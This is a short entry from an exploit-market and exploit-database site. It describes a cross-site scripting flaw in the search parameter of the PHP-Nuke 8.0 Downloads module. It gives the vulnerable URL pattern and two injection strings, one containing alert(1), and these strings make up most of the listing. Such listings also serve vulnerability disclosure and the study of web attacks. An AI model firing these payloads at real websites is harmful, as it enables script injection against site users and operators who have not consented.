[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP-Nuke <= 8.0 Downloads Module XSS

Author
Rohit Bansal
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10000
Category
web applications
Date add
21-11-2009
Platform
unsorted
====================================
PHP-Nuke <= 8.0 Downloads Module XSS
====================================

# Exploit Title: XSS Downloads Module PHP-Nuke <= 8.0
# Date: 19 Nov 2009
# Author: Rohit Bansal
# Version: PHP-Nuke <= 8.0
# Tested on: independent platform
# Code :
 
--------------------------------------------------------------
|XSS Downloads Module PHP-Nuke <= 8.0
|Grab Status: 100%. |
--------------------------------------------------------------
 
[+] VULN:
 
http://server/modules.php?name=Downloads&d_op=search&query=[XSS]
 
WHERE IS:
 
[XSS] = '';!--"
 
OR
 
'';!--"=&{(alert(1))}
----------------------------------------------------------------------------------------------



#  0day.today [2024-12-23]  #